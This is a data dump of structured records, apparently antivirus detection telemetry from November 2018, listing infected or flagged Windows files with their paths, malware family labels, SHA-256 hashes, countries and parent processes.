  Row(detection=Row(filename='atheros_ar9285_wireless_network_adapter_9.2.1.459_win7_amd64.exe', filepath='G:\\Sicherungen\\Asus Laptop Treiber\\8Treiber\\Treiber 17.02.2015\\Atheros_AR9285_Wireless_Network_Adapter_9.2.1.459_win7_amd64.exe', filesize=1536000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='809373f0b818ac2617c2898b187f8c42a66ee3f6b5a672c35a6627dbbdd0ad21', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:16:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:44:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a361bdcee6a54fb7341497ca1cf995dedb4cd3c0b88783a325d36f6de67d2d40', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A361BDCEE6A54FB7341497CA1CF995DEDB4CD3C0B88783A325D36F6DE67D2D40', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a361bdcee6a54fb7341497ca1cf995dedb4cd3c0b88783a325d36f6de67d2d40', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iwjylcbb.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\IWjyLcbB.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='delegate_execute.exe', filepath='C:\\Users\\X\\AppData\\Local\\Maelstrom\\Application\\44.0.1.3\\delegate_execute.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='bc2516bca803dd187b4c8831aea92d938a8a3d7122e4f436e42f6ff3f5561c55', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dtcG\\\\\\/Cv0+kKhPq9N.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T06:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a36305778d7e6db23dce9e3d4e4106411a9672a4ef65899db2d9d6b3429cc3ff.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\A36305778D7E6DB23DCE9E3D4E4106411A9672A4EF65899DB2D9D6B3429CC3FF.VIR', filesize=516000, name='TR/ATRAPS.Gen.#M300.#R3887'), hash='a36305778d7e6db23dce9e3d4e4106411a9672a4ef65899db2d9d6b3429cc3ff', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:47:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:19:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113251-ee6e0a95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1319955c\\AVSCAN-20181102-113016-D8D36EE0\\AVSCAN-20181102-113251-EE6E0A95', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:32:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7CA69BCFE251EAE221B6D707D7C1DD00789BD9D1016DB898BC914FFD5ECE4079', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cj7i1ms1b.exe', filepath='\\\\?\\C:\\Program Files\\0U03TMM0BO\\CJ7I1MS1B.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='8b89a98a561958e87953f6daa4f96b58f73edee4630396363aa1ea09d732cf60', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7BAA98F4B13364D95285AAADDCE488A59C060804CB1C821D173BD7C56720B5D3', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:14:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='workpanel.exe', filepath='\\?\\G:\\上環機-3\\軟式操作盤\\WorkPanel.exe', filesize=2560000, name='W32/Jadtre.K.#M1.#R1'), hash='75d6102ddffe6cbd11af718876170ce8e0937cff902d448324cb68b9a31dc45a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:31:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled (2017_11_08 21_15_05 utc).exe', filepath='\\\\?\\D:\\ServerFolders\\File History Backups\\Admin03\\Admin03@MCCOYOFFICE.local\\DESKTOP-GQ6NIDG\\Data\\C\\Users\\admin03.MCCOYOFFICE\\Downloads\\FileZilla_3.29.0_win64-setup_bundled (2017_11_08 21_15_05 UTC).exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T06:45:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iemokjeto.nff', filepath='\\?\\C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\CegwUwuk\\IemoKjeto.nff', filesize=256000, name='TR/Crypt.ZPACK.Gen8.#M300.#R700363'), hash='e0cf09c64b7d1562da007e976e2804b5d867be15f13cbc57ace127be336b0047', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:35:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rual62v.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-3838400726-2184387064-1909925687-1001\\$RUAL62V.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T15:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='9d474e14281cc8d51b8c02cf81a14415f94770561036fe42db4bf164613d9714', metadata=Row(cmdline=None, country='GD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6787480, timestamp='2018-11-02T22:24:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='f2522a4e8d7e1f0554f0d7a8a6420b78a1aaf0543838282afb2a55d3a5d9b3f3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112805-cc662f07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c0eec5c3\\AVSCAN-20181102-112648-C456F280\\AVSCAN-20181102-112805-CC662F07', filesize=2496000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='fcd8a7c191ad93cfd047a8a2f6dceca9e0a3bac7ad803f5e3318ca7a82790366', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:58:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dxfix.exe', filepath='\\\\ts-xelcea\\share\\vecchio pc dino\\hd vecchio pc\\programmi\\autocad r14\\BONUS\\UTILS\\dxfix.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='e4b7d54a5292b319160bb1999b862d86a5d61b20249d7bae1562ba9cc8b52bcd', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='andimgtool.exe', filepath='d:\\firmwaremx2\\scoped_dir1540_10\\andimgtool.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='f9fa9c5568df932f012e04e81233b04456f4e8348d5760a7e2f7a0cb347fe52b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Programs\\Opera\\56.0.3051.52\\opera.exe', parentsize=1581144, timestamp='2018-11-02T14:24:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221459-5a9d61ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221459-5A9D61CE', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\goyeegboaoh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:33:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1b88755b.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1b88755b.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:06:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b82135f71a257171cba9bd917e72f579a66129d29966a80f471e0fb721c456b8.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B82135F71A257171CBA9BD917E72F579A66129D29966A80F471E0FB721C456B8.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b82135f71a257171cba9bd917e72f579a66129d29966a80f471e0fb721c456b8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:53:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:56:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{9899B8B5-C656-4816-903C-29C4185BF674}\\setup.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='8c2da0482680dbd488a83bff78066b4652194f51d3dd57a5e74b5600c6e66904', metadata=Row(cmdline='\\\\\\/F \\\\\\/T \\\\\\/R', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wbem\\WMIADAP.exe', parentsize=115200, timestamp='2018-11-02T09:17:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp002396f4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002396f4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:42:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:59:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203855-1664eed3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203855-1664EED3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl173.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl173.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d3e3', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d3e3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:48:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:26:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202400-cb4688d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202400-CB4688D3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:23:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152305-5d5440d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b86276e2\\AVSCAN-20181103-124328-1505CFF1\\AVSCAN-20181104-152305-5D5440D2', filesize=832000, name='ADWARE/ConvertAd.Gen7.#M1.#R1'), hash='e1f9e2ddf2d95ce794c3dcf3f65443726d9cb1cc78d0b2f3fc524da65c074ef3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:23:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291174', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291174', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:46:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsd31C.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T13:45:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ta_wcdmarf_impl.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Nokia\\TssProductApiA\\ta_wcdmarf_impl.dll', filesize=960000, name='W32/Ramnit.CD.#M1.#R1'), hash='e0e15f9421c0271e77371dcb0042ef17bd9d43304484594206c7460c59429959', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:52:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='psftp.exe', filepath='C:\\Program Files (x86)\\HTC\\HTC Sync Manager\\psftp.exe', filesize=412000, name='W32/Sality.AT.#M1.#R1'), hash='f4f05a4c250e852a540c7aad9858041d3f916e6eb72ac6bd5bfaf5ab5727c6b2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:8e82eeoY+EK5dRjM.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T13:58:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ftx global vector configuration tool.exe', filepath='\\\\?\\E:\\Program Files (x86)\\Steam\\steamapps\\common\\FSX\\ORBX\\FTX_VECTOR\\FTX GLOBAL VECTOR Configuration Tool.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='containerized.exe', filepath='C:\\Windows\\containerized.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline='\\\\\\/SkipUac', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8227088, timestamp='2018-11-01T12:57:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='arm-apple-darwin9-as.exe', filepath='C:\\Program Files\\Adobe\\Adobe Flash CC\\AIR3.6\\lib\\aot\\bin\\as\\arm-apple-darwin9-as.exe', filesize=544000, name='W32/Sality.AT.#M1.#R1'), hash='fcf28888fdf1634affefb5a7413dc349dcded8a57fec94c2b27e90142a8c4b47', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:23:23Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3F81ED12CF783663ACE3F754BB552275736986B0A32BAD2F9B6B660428C149A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ext.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\jre\\lib\\ext\\ext.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000592a', filepath='C:\\Windows\\Temp\\tmp00005bb7\\tmp0000592a', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='38b2c463ce44c51483e7ca8725d161a7a52deab0dc10649a103735b617efa635', metadata=Row(cmdline='-k bdx -s scan', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T16:07:48Z'), dt=datetime.date(2018, 11, 2)),
